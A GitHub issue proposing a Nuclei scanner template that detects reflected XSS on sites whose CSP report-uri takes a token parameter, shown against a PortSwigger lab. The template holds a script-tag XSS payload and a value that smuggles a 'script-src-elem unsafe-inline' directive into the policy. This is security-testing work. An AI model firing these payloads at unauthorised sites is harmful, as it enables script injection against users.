### ISSUE TITLE
Reflected XSS protected by CSP, with CSP bypass

### ISSUE THREAD

**Issue by umair-villanio** [projectdiscovery/nuclei-templates#6896]
### Template Information:

This template searches for a specific string in the response body that is vulnerable to XSS. This XSS method is only possible on websites which uses CSP with a token parameter for report-uri directive.

Reference: https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-csp-bypass

### Nuclei Template:

```yaml

id: reflected-xss-csp-report-uri

info:
  name: Reflected XSS protected by CSP, with CSP bypass
  author: Umair Hussain
  description: Detecting the presence of XSS vulnerability on websites that uses CSP report-uri with a token parameter
  severity: medium
  tags: xss,bypass,csp,report-uri,token

requests:

  - method: GET
    path:
      - "{{BaseURL}}%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "?token="

      - type: word
        part: body
        words:
          - <script>alert(1)</script>

      - type: status
        status:
          - 200

```

Response from nuclei: [reflected-xss-csp-report-uri] [http] [medium] https://0a6000280373c255c5b72c45004b00c8.web-security-academy.net/?search&search=%3Cscript%3Ealert(1)%3C%2Fscript%3E&token=script-src-elem%20%27unsafe-inline%27
